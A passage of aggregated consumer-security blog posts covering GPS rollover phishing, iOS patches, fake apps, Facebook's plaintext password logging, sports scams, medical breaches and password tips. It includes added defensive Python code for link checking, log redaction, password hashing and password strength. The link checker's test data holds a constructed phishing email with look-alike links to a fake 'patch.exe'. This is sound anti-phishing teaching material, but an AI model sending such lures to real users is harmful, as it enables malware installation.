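def full_gps_week(d: date) -> int:
    """Unambiguous week count since the GPS epoch."""
    return (d - GPS_EPOCH).days // 7


def broadcast_week(d: date) -> int:
    """The value a legacy satellite message actually carries: the week number truncated to 10 bits."""
    return full_gps_week(d) % WEEK_MODULUS


def decode_naive(week10: int) -> date:
    """A receiver that takes the 10-bit value at face value.
    Correct until the first rollover, then 1,024 weeks in the past."""
    return GPS_EPOCH + timedelta(weeks=week10)


def decode_with_reference(week10: int, reference: date) -> date:
    """A receiver that assumes 'now' is no earlier than a known reference date
    (assumption: the firmware build date) and picks the matching 1,024-week block.
    Returns the Sunday that starts the decoded week."""
    ref_week = full_gps_week(reference)
    block_start = ref_week - (ref_week % WEEK_MODULUS)   # first week of the reference's block
    week = block_start + week10
    if week < ref_week:              # value already wrapped past the reference: use the next block
        week += WEEK_MODULUS
    return GPS_EPOCH + timedelta(weeks=week)


if __name__ == "__main__":
    reference = date(2015, 1, 1)    # assumed firmware build date
    for d in (date(1999, 8, 21), date(1999, 8, 22), date(2019, 4, 6), date(2019, 4, 7)):
        w10 = broadcast_week(d)
        print(f"{d}: full week {full_gps_week(d)}, broadcast {w10:4d}, "
              f"naive -> {decode_naive(w10)}, with reference -> {decode_with_reference(w10, reference)}")
```

The reference-date trick only pushes the problem out: a receiver built against a 2015 reference will itself misdecode 1,024 weeks after that reference, which is why devices of different vintages fail on different dates rather than all at once, and why the manufacturer’s firmware update, not a workaround, is the fix the advisory calls for.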

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, given the media attention this bug is receiving, it’s not far-fetched to expect cybercriminals to leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and urging users to install a fraudulent software patch to fix the issue. The emails could carry a malicious payload that leaves the victim with malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate that the email is from a recognized sender. Always check the validity of signature lines, including the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.
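The “hover over the link” advice above can be automated for a mailbox or a mail gateway. The following added example (not from the McAfee post) parses the links out of an HTML message and flags the three things a person would notice on hover: a visible URL that names one domain while the href goes to another, a host outside the sender’s known domains, and an internationalized or punycode host that can be a look-alike. The brand, the domains and the sample message are constructed for illustration; the public-suffix handling is simplified, as noted in the code.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List, Set, Tuple
from urllib.parse import urlparse

# Added example (not from the McAfee post): flag links in an HTML email whose
# visible text, host, or encoding does not match where the href really goes.
# Brand, domains and the sample message are constructed for illustration.


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links: List[Tuple[str, str]] = []
        self._href = None
        self._text: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host: str) -> str:
    """Last two labels of a hostname. Assumption: no public-suffix list, so
    two-level suffixes such as co.uk are not handled."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


_URL_IN_TEXT = re.compile(r"https?://([^/\s]+)", re.I)


def suspicious_links(html: str, trusted_domains: Set[str]) -> List[Dict[str, object]]:
    """Return every link with at least one reason to distrust it."""
    parser = LinkExtractor()
    parser.feed(html)
    findings: List[Dict[str, object]] = []
    for href, text in parser.links:
        host = urlparse(href).hostname or ""
        reasons: List[str] = []
        if not host.isascii() or host.startswith("xn--") or ".xn--" in host:
            reasons.append("internationalized/punycode host (possible look-alike)")
        m = _URL_IN_TEXT.search(text)
        if m and registrable_domain(m.group(1)) != registrable_domain(host):
            reasons.append(f"visible URL says {m.group(1)} but link goes to {host}")
        if registrable_domain(host) not in trusted_domains:
            reasons.append(f"{host} is not a trusted sender domain")
        if reasons:
            findings.append({"href": href, "text": text, "reasons": reasons})
    return findings


# Constructed sample message in the style of the rollover lure described above.
SAMPLE_EMAIL = """
<p>Your receiver is affected by the GPS week rollover. Install the patch now:</p>
<a href="http://example-gps.com.updates-now.net/patch.exe">https://support.example-gps.com/update</a>
<p>Questions? Visit our <a href="https://support.example-gps.com/">support site</a>.</p>
<a href="http://xn--exmple-gps-4cb.com/patch">https://example-gps.com/patch</a>
"""

if __name__ == "__main__":
    for finding in suspicious_links(SAMPLE_EMAIL, {"example-gps.com"}):
        print(finding["href"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The first lure relies on the eye reading the left-most labels of the host (example-gps.com.updates-now.net); the checker compares registrable domains instead, which is the comparison your hover tooltip leaves you to do by hand.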

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

British Government Report Confirms Huawei Cybersecurity Concerns

A report issued by the British government has concluded that products developed and manufactured by the Chinese telecommunications company Huawei present significant security risks.

Assembled by the Huawei Cyber Security Evaluation Centre (HCSEC) and presented to the UK National Security Adviser, the report found that on a wide range of security issues related to both its software and engineering, Huawei has failed to maintain adequate protections.

“Poor software engineering and cybersecurity processes lead to security and quality issues, including vulnerabilities. The number and severity of vulnerabilities discovered, along with architectural and build issues, by the relatively small team in HCSEC is a particular concern. If an attacker has knowledge of these vulnerabilities and sufficient access to exploit them, they may be able to affect the operation of the network, in some cases causing it to cease operating correctly,” stated the report, going on to add:

“These findings are about basic engineering competence and cybersecurity hygiene that give rise to vulnerabilities that are capable of being exploited by a range of actors.”

Huawei has been the subject of ongoing controversy in the West. Its bids to build the infrastructure for 5G wireless networks have been blocked in the United States, Australia, and New Zealand for security reasons and over allegations that its equipment contains backdoors the Chinese government can exploit. U.S. Secretary of State Mike Pompeo has warned European nations that using Huawei equipment makes it “more difficult” for the U.S. to partner with them.

Huawei is currently suing the United States over the ban, and the company’s chairman Guo Ping has accused the U.S. government of having a “loser’s attitude,” saying that “The U.S. has abandoned all table manners.”

The post British Government Report Confirms Huawei Cybersecurity Concerns appeared first on Adam Levin.

iOS Users: Update Your Software to Avoid Security Vulnerabilities

On Monday, Apple made some bold announcements at its keynote event, including new subscription offerings for news, television, video games, and a credit card service. But while these exciting announcements were being made, the release of iOS 12.2 seemed to slip under the radar. This update contains 51 different security fixes and covers devices from the iPhone 5s and later and the iPad Air, as well as products running tvOS. The patches address a variety of bugs that cybercriminals could use to cause denial of service, overwrite arbitrary files, or execute malicious code.

The iOS 12.2 update includes patches for vulnerabilities in core apps like Contacts, FaceTime, Mail, Messages, and more. According to security professional Alex Stamos, most of the vulnerabilities were found in WebKit, the browser engine Apple uses in many of its products, including Safari, Mail, and the App Store. Among these were memory corruption bugs that could lead to arbitrary code execution, meaning a malicious web page or message could run code of the attacker’s choosing on the device, potentially reaching the victim’s files or giving the attacker remote control of the system. Apple’s fixes for these are described as improved memory handling, state management, and validation. Another issue patched by this update allowed a cybercriminal to bypass sandbox restrictions, the boundaries that keep an app or process from reaching data and system resources outside its own; Apple addressed it with improved validation checks.

While it can be easy to click the “Remind Me Later” option when you receive a software update notification, the security updates included in iOS 12.2 should not be overlooked. To help keep your iOS devices protected and running smoothly, check out the following tips:

  • Update your software. To update your device to iOS 12.2, go to your Settings, then to General, and then click Software Update. From there, you will be able to download and install the update and patch over 50 security holes.
  • Turn on automatic updates. Turning on automatic updates helps shield you from exposure to threats brought on by software bugs and vulnerabilities. You can enable automatic updates in your Settings as well.
  • Use a security solution. To add an extra layer of protection to all your devices, install a security solution like McAfee Total Protection. This will allow you to have an extra security weapon and help defend your devices from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iOS Users: Update Your Software to Avoid Security Vulnerabilities appeared first on McAfee Blogs.

Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home

Like most parents, before you go to sleep each night, you take extra care to lock doors and windows to keep your family safe from any outside threats. The only thing you may have overlooked is the smartphone illuminated on your nightstand. And if you were to add up the smartphones humming all over your house, suddenly you’d have a number of unlocked doors that a determined criminal could enter through. Maybe not tonight — but eventually.

Digital Ecosystem

Over time you’ve purchased and plugged in devices throughout your home. You might have a voice assistant, a baby monitor, a thermostat, a treadmill, a gaming system, a fitness watch, smart TVs, a refrigerator, and many other fun, useful gadgets. Each purchase likely connects to your smartphone. Take stock: You now have a digital ecosystem growing all around you. And while you rarely stop to take notice of this invisible power grid around you, hackers can’t stop thinking about it.

This digital framework that pulsates within your home gives cybercriminals potential new entryways into your life and your data. Depending on your devices, by accessing your smartphone, outsiders may be able to unlock your literal doors while you are away (via your home security system), eavesdrop on your family conversations and collect important information (via your voice assistant), or access financial information (via your gaming system, tablet, or laptop).

What you can do:

  • Change factory security settings. Before you fire up that smart TV, drone, or sound system, be sure to change each product’s factory settings and replace the default password with a strong, unique one to put a layer of protection between you and would-be hackers.
  • Protect your home network. We are connected people living in connected homes. So, part of the wired lifestyle is taking the lead on doing all we can to protect it. One way to do that is at the router level with built-in network security, which can help secure your connected devices.
  • Stay on top of software updates. Cybercrooks rely on consumers to ignore software updates; it makes their job so much easier. So be sure to install updates to your devices, security software, and IoT products when alerted to do so.

Smartphone = Front Gate

The most common entry point to all of these connected things is your smartphone. While you’ve done a lot of things to protect your phone — a lock screen, secure passwords on accounts, and system updates — there are hacking tactics you likely know nothing about. According to McAfee’s recent Mobile Threat Report, you don’t know because the scope and complexity of mobile hacks are increasing at alarming rates.

Hidden Apps

The latest statistics report that the average person has between 60 and 90 apps installed on their phone. Multiply that by all the users in your home, and you are looking at anywhere from 200 to 500 apps living under your digital roof. Hackers gravitate toward digital trends. They go where the most people congregate because that’s where they can grab the most money. Many of us control everything in our homes from our apps, so app downloads are off the charts, which is why crooks have engineered some of their most sophisticated schemes specifically around app users.

Hidden apps are a way that crooks trick users into letting them inside their phones. They reach users in more than one way, including through games or customized tools downloaded from Google Play. TimpDoor, for instance, arrives by text message: the text carries a link to a supposed voice message along with detailed instructions for enabling apps from unknown sources, and the link downloads malware that keeps running in the background after the app is closed. Users often forget they’ve downloaded it and go on with life while the malware runs quietly and can be used to reach the internal networks the smartphone is connected to.

What you can do:

  • Stay alert. Don’t fall for the traps or click links to other apps sent via text message.
  • Stay legit. Only download apps hosted by the original trusted stores and verified partner sites.
  • Avoid spam. Don’t click on any email links, pop-ups, or direct messages that include suspicious links, password prompts, or fake attachments. Delete and block spam emails and texts.
  • Disable and delete. If you are not using an app, disable it. And, as a safety habit, remove apps from your phone, tablet, or laptop you no longer use.

Fake Apps

Again, crooks go where the most people congregate, and this year it is the 60 million+ downloaded game Fortnite. The Fortnite craze has led hackers to design fake Fortnite apps masquerading as the real thing. The fraudulent app designers go to great lengths to make the download look legitimate. They offer enticing downloads and promise users a ton of free perks and add-ons. Once users download the fake app, crooks can collect money through ads, send text messages with more bad app links, cryptojack users, or install malware or spyware.

What you can do:

  • Don’t install apps from unknown sources. Not all gaming companies distribute via Google Play or the App Store. This makes it even harder for users to know that the app they are downloading is legit. Do all you can to verify the legitimacy of the site you are downloading from.
  • Delete suspicious acting apps. If you download an app and it begins to request access to anything outside of its service, delete it immediately from your device.
  • Update devices regularly. Keep new bugs and threats at bay by updating your devices automatically.
  • Monitor bank statements. Check statements regularly to monitor the activity of the card linked to your Fortnite account. If you notice repeat or multiple transactions from your account or see charges that you don’t recognize, alert your bank immediately.
  • Be a savvy app user. Verify an app’s legitimacy. Read other user reviews and be discerning before you download anything. This practice also applies to partner sites that sell game hacks, credits, patches, or virtual assets players use to gain rank within a game. Beware of “free” downloads and avoid illegal file-sharing sites. Free downloads can be hotbeds for malware. Stick with the safer, paid options from a reputable source.

The post Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home appeared first on McAfee Blogs.

Facebook Users: Here are Proactive Tips to Keep Your Data Safe

Social media has become extremely popular over the years, providing users with an easy way to communicate with their friends and family. As social media users, we put a lot of faith and trust in these platforms to maintain the security of our private information. But what happens when our private information is mishandled? The reality is that these incidents happen and users need to be prepared. Yesterday, Facebook announced that it did not properly mask the passwords of hundreds of millions of its users, primarily those associated with Facebook Lite.

You might be wondering how exactly this happened. It appears that many user passwords for Facebook, Facebook Lite, and Instagram were stored in plaintext in an internal company database. This means that thousands of Facebook employees had access to the database and could have potentially searched through these user passwords. Thankfully, no cases of data misuse were reported in the investigation, and these passwords were never visible to anyone outside of the company. According to Facebook software engineer Scott Renfro, Facebook is in the process of investigating long-term infrastructure changes to prevent these security issues going forward.

According to Facebook’s vice president of engineering, security, and privacy, the company has corrected the password logging bug and plans to notify the users whose passwords may have been exposed. But what can users do to better protect their data when an incident like this occurs? Check out the following tips:

  • Change your password. As a precautionary step, update your Facebook and Instagram passwords by going into the platforms’ security and privacy settings. Make sure your passwords are unique and complex.
  • Use multi-factor authentication. While this shouldn’t be your be-all and end-all security solution, it can help protect your credentials in the case of data exposure.
  • Set up a password manager. Using a password manager is one of the easiest ways to keep track of and manage your passwords so you can easily change them after these types of incidents occur.
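The incident above was a logging bug: the passwords were captured in plaintext on their way through internal systems, not broken out of a properly hashed store. The following added example (this is not Facebook’s code, and the field names and storage format are this example’s own choices) shows the two controls that keep such a bug from exposing anything readable: a log filter that masks credential fields before a record is written, and salted PBKDF2 hashing with a self-describing stored format so that only a verifier ever sees the original password.

```python
import hashlib
import hmac
import logging
import os
import re
from typing import Optional

# Added example (not Facebook's code): keep credentials out of logs and out of
# plaintext storage. Field names, the stored-hash format and the iteration count
# are this example's own choices.

SENSITIVE_FIELDS = {"password", "passwd", "pass", "token", "secret", "otp"}
_KV_PATTERN = re.compile(r"(?i)\b(password|passwd|pass|token|secret|otp)=([^&\s]+)")
PBKDF2_ITERATIONS = 600_000   # assumption: current OWASP-level work factor for PBKDF2-HMAC-SHA256


def redact_params(params: dict) -> dict:
    """Copy of a parsed request/form dict with credential fields masked, for structured logging."""
    return {k: ("[REDACTED]" if k.lower() in SENSITIVE_FIELDS else v) for k, v in params.items()}


def redact_message(msg: str) -> str:
    """Mask key=value credentials inside free-text log lines (query strings, debug dumps)."""
    return _KV_PATTERN.sub(r"\1=[REDACTED]", msg)


class RedactingFilter(logging.Filter):
    """Attach to a logger or handler so every record is scrubbed before it is written."""

    def filter(self, record: logging.LogRecord) -> bool:
        record.msg = redact_message(str(record.msg))
        if isinstance(record.args, tuple):
            record.args = tuple(redact_message(str(a)) for a in record.args)
        return True


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted PBKDF2-HMAC-SHA256. The stored string records its own parameters
    so the work factor can be raised later without breaking existing entries."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iterations; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    log = logging.getLogger("auth")
    handler = logging.StreamHandler()
    handler.addFilter(RedactingFilter())
    log.addHandler(handler)
    log.setLevel(logging.INFO)

    # Constructed login request: the kind of line that ends up in a debug log.
    form = {"user": "bob", "password": "hunter2"}
    log.info("POST /login user=%s&password=%s", form["user"], form["password"])
    log.info("parsed form: %s", redact_params(form))

    stored = hash_password(form["password"])
    print(stored)
    print("verify correct:", verify_password("hunter2", stored))
    print("verify wrong:  ", verify_password("hunter3", stored))
```

The filter catches the two ways a password usually leaks into logs, as a formatted message and as a format argument; the hash format keeps salt and iteration count beside the digest so the verifier never depends on a global setting that might silently change.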

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Users: Here are Proactive Tips to Keep Your Data Safe appeared first on McAfee Blogs.

How Online Scams Drive College Basketball Fans Mad

Sports fans everywhere look forward to mid-March for the NCAA men’s college basketball tournament. However, it’s not just college basketball fans that look forward to this time of year. Cybercriminals use March to launch malicious campaigns in the hopes of gaining access to personal information from unsuspecting fans. Let’s take a look at the most popular techniques cybercriminals use to gain access to passwords and financial information, as well as encourage victims to click on suspicious links.

Online betting provides cybercriminals with a wealth of opportunities to steal personal and financial information from users looking to engage with the games while potentially making a few extra bucks. The American Gaming Association (AGA) estimates that consumers will wager $8.5 billion on the 2019 NCAA men’s basketball tournament. What many users don’t realize is that online pools that ask for your personal and credit card information create a perfect opportunity for cybercriminals to take advantage of unsuspecting fans.

In addition to online betting scams, users should also be on the lookout for malicious streaming sites. As fewer and fewer homes have cable, many users turn to online streaming sites to keep up with all of the games. However, even seemingly reputable sites could contain malicious phishing links. If a streaming site asks you to download a “player” to watch the games, there’s a real possibility that you could end up with malware on your computer.

Ticket scammers are also on the prowl during March, distributing fake tickets on classified sites they’ve designed to look just like the real thing. Of course, these fake tickets all have the same barcode. With these scams floating around the internet, users looking for cheap tickets to the games may be more susceptible to buying counterfeit tickets if they are just looking for the best deal online and are too hasty in their purchase.

So, if you’re a college basketball fan hoping to partake in this exciting month – what next? In order to enjoy the fun that comes with the NCAA tournament without the risk of cyberthreats, check out the following tips to help you box out cybercriminals this March:

  • Verify the legitimacy of gambling sites. Before creating a new account or providing any personal information on an online gambling website, poke around and look for information any legitimate site would have. Most gambling sites will have information about the site rules (i.e., age requirements) and contact information. If you can’t find such information, you’re better off not using the site.
  • Be leery of free streaming websites. The content on some of these free streaming websites is likely stolen and hosted in a suspicious manner, as well as potentially contains malware. So, if you’re going to watch the games online, it’s best to purchase a subscription from a legitimate streaming service.
  • Stay cautious on popular sports sites and apps. Cybercriminals know that millions of loyal fans will be logging on to popular sports sites and apps to stay updated on the scores. When you’re visiting these sites, be careful not to click on any suspicious ads or links that could lead to malware. If you see an offer that interests you in an online ad, you’re better off going directly to the website of the company displaying the ad instead of clicking the ad from the sports site or app.
  • Beware of online ticket scams. Scammers will be looking to steal payment information from fans in search of last-minute tickets to the games. To avoid this, it’s best to buy directly from the venue whenever possible. If you decide to purchase from a reseller, make sure to do your research and only buy from trusted vendors.
  • Use comprehensive security software. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links, and will warn you in the event that you do accidentally click on something malicious. It will provide visual warnings if you’re about to go to a suspicious site.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post How Online Scams Drive College Basketball Fans Mad appeared first on McAfee Blogs.

How to Safeguard Your Family Against A Medical Data Breach

The risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out, or with the online application for healthcare you completed.

That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

Breaches on the Rise

Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records exposed through a hacking or IT incident, at a cost to consumers of nearly $6 billion.

The IoT Factor


Medical facilities are not the only targets. With the growth of the Internet of Things (IoT), consumer products — which, in short, means everything is digitally connected to everything else — also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, and heart and blood pressure monitors.

To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

The Dark Web

The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

Some of the most valuable data to criminals is children’s health information (stolen from pediatrician offices), since a child’s credit record is clean and therefore more useful for credit card fraud.

According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

“The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” Says Samani.


Healthcare professionals, hospitals, and health insurance companies, while responsible for the entry points criminals use, aren’t the bad guys. They are fined by the government for breaches and inadequate security, and targeted and extorted by cyber crooks, all while focusing on patient care and outcomes. Another factor working against them is the shortage of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker, matters. There are some things you can do to strengthen your family’s healthcare data practices.

Ways to Safeguard Medical Data

Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

How to Protect IoT Devices


According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

  • Change default usernames and passwords
  • Isolate IoT devices on their own protected networks
  • Configure network firewalls to inhibit traffic from unauthorized IP addresses
  • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
  • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
  • Ensure devices and their associated security patches are up-to-date
  • Apply cybersecurity best practices when connecting devices to a wireless network
  • Invest in a secure router with appropriate security and authentication practices

The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.

Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics

Free apps have a lot of appeal for users. They don’t cost a cent and can help users complete tasks on-the-go. However, users should take precautions before installing any app on their device. Researchers here at McAfee have observed some Android apps using extremely deceptive techniques to try and trick users into signing up for a very expensive service plan to use basic tool functionalities like voice recording and opening zip files.

The two apps being called into question, “Voice recorder free” and “Zip File Reader,” have been downloaded over 600,000 times combined. So at first glance, users may assume that these are reputable apps. Once installed, they offer the user an option to use a “Free trial” or to “Pay now.” If the user selects the trial version, they are presented with a subscription page to enter their credit card details for when the three-day trial is over. However, these apps charge a ridiculously high amount once the trial is up. “Voice recorder free” charges a whopping $242 a month and “Zip File Reader” charges $160 a week.

Users who have downloaded these apps and then deleted them after their free trial may be surprised to know that uninstalling the app will not cancel the subscription, so they could still be charged these astronomical amounts for weeks without realizing it. While this is not technically illegal, it is a deceptive tactic that app developers are using to try to make an easy profit off of consumers who might forget to cancel their free trial.

With that said, there are a few things users can do to avoid becoming victims of deceptive schemes such as these in the future. Here are some tips to keep in mind when it comes to downloading free apps:

  • Be vigilant and read app reviews. Even if an app has a lot of downloads, make sure to comb through all of the reviews and read up before downloading anything to your device.
  • Read the fine print. If you decide to install an app with a free trial, make sure you understand what fees you will be charged if you keep the subscription.
  • Remember to cancel your subscription. If you find a reputable free app that you’ve researched and want to use for a trial period, remember to cancel the subscription before uninstalling the app from your device. Instructions on canceling, pausing, and changing a subscription can be found on Google Play’s Help page.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Basic Android Apps Are Charging High Subscription Fees With Deceptive Tactics appeared first on McAfee Blogs.

5 Tips For Creating Bulletproof Passwords

While biometric tools like facial ID and fingerprints have become more common when it comes to securing our data and devices, strong passwords still play an essential part in safeguarding our digital lives.

This can be frustrating at times, since many of us have more accounts and passwords than we can possibly remember. This can lead us to dangerous password practices, such as choosing short and familiar passwords, and repeating them across numerous accounts. But password safety doesn’t have to be so hard. Here are some essential tips for creating bulletproof passwords.

Remember, simple is not safe

Every year surveys find that the most popular passwords are as simple as “1234567” and just “password.” This is great news for the cybercrooks, but really bad news for the safety of our personal and financial information.

When it comes to creating strong passwords, length and complexity matter because they make passwords harder to guess, and harder to crack if the cybercriminal is using an algorithm to quickly process combinations. The alarming truth is that passwords that are just 7 characters long take less than a third of a second to crack using these “brute force attack” algorithms.

Tricks:

  • Make sure that your passwords are at least 12 characters long and include numbers, symbols, and upper and lowercase letters.
  • Try substituting numbers and symbols for letters, such as zero for “O”, or @ for “A”.
  • If you’re using internet-connected devices, like IP cameras and interactive speakers, make sure to change the default passwords to something unique, since hackers often know the manufacturer’s default settings.

Keep it impersonal

Passwords that include bits of personal information, such as your name, address, or pet’s name, are easier to guess. This is especially true when we share a lot of personal information online. But you can use personal preferences that aren’t well known to create strong passphrases.

Tricks:

  • Try making your password a phrase, with random numbers and characters. For instance, if you love crime novels you might pick the phrase: ILoveBooksOnCrime
    Then you would substitute some letters for numbers and characters, and put a portion in all caps to make it even stronger, such as: 1L0VEBook$oNcRIM3!
  • If you do need to use personal information when setting up security questions, choose answers that are not easy to find online.
  • Keep all your passwords and passphrases private.
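As an added example (not McAfee’s code), the rules from the last two sections in Python: it checks the 12-character, four-character-class rule, sizes the keyspace an attacker must exhaust for the page’s sample passwords, and flags personal terms even when they hide behind number-and-symbol substitutions. The guess rate and the personal terms are constructed assumptions, not figures from the article.

```python
import math
import string

# Character classes used to size the brute-force search space.
CLASSES = {
    "lower": set(string.ascii_lowercase),
    "upper": set(string.ascii_uppercase),
    "digit": set(string.digits),
    "symbol": set(string.punctuation),
}

# Assumed offline guess rate (constructed for illustration, not from the article).
ASSUMED_GUESSES_PER_SECOND = 1e10

# The common letter substitutions the article suggests, reversed so that a
# password can be normalised before it is compared against personal terms.
UNLEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                        "7": "t", "@": "a", "$": "s", "!": "i"})


def classes_used(password: str) -> set:
    """Names of the character classes that appear in the password."""
    return {name for name, chars in CLASSES.items()
            if any(c in chars for c in password)}


def meets_policy(password: str) -> bool:
    """The article's rule: at least 12 characters with numbers, symbols,
    and both upper- and lowercase letters."""
    return len(password) >= 12 and classes_used(password) == set(CLASSES)


def search_space(password: str) -> int:
    """Keyspace an attacker must cover if they know the length and which
    character classes are in use: alphabet_size ** length."""
    alphabet = sum(len(CLASSES[name]) for name in classes_used(password))
    return alphabet ** len(password)


def entropy_bits(password: str) -> float:
    """log2 of the keyspace, the usual way to compare search spaces."""
    return math.log2(search_space(password))


def crack_seconds(password: str, rate: float = ASSUMED_GUESSES_PER_SECOND) -> float:
    """Worst-case time to exhaust the keyspace at the assumed guess rate."""
    return search_space(password) / rate


def contains_personal(password: str, personal_terms: list) -> bool:
    """True if any personal term (name, pet, street) appears in the password,
    ignoring case and undoing the substitutions in UNLEET first."""
    normalised = password.lower().translate(UNLEET)
    return any(term.lower() in normalised or term.lower() in password.lower()
               for term in personal_terms)


def evaluate(password: str, personal_terms: list) -> dict:
    """Combine the checks into one report for a single password."""
    return {
        "length": len(password),
        "classes": sorted(classes_used(password)),
        "meets_policy": meets_policy(password),
        "entropy_bits": round(entropy_bits(password), 1),
        "crack_seconds": crack_seconds(password),
        "personal_info": contains_personal(password, personal_terms),
    }


if __name__ == "__main__":
    # Constructed personal terms and the article's own sample passwords.
    personal = ["Fluffy", "Main Street"]
    samples = ["1234567", "ILoveBooksOnCrime", "1L0VEBook$oNcRIM3!", "F1uffy2019!!"]
    for pw in samples:
        print(pw, evaluate(pw, personal))
```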

Never reuse passwords

If you reuse passwords and someone guesses a password for one account, they can potentially use it to get into others. This practice has gotten even riskier over the last several years, due to the high number of corporate data breaches. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts.

Tricks:

  • Use unique passwords for each one of your accounts, even if it’s for an account that doesn’t hold a lot of personal information. These too can be compromised, and if you use the same password for more sensitive accounts, they too are at risk.
  • If a website or monitoring service you use warns you that your details may have been exposed, change your password immediately.

Employ a password manager

If just the thought of creating and managing complex passwords has you overwhelmed, outsource the work to a password manager! These are software programs that can create random and complex passwords for each of your accounts, and store them securely. This means you don’t have to remember your passwords – you can simply rely on the password manager to enter them when needed.

Tricks:

  • Look for security software that includes a password manager
  • Make sure your password manager uses multi-factor authentication, meaning it uses multiple pieces of information to identify you, such as facial recognition, a fingerprint, and a password.

Boost your overall security

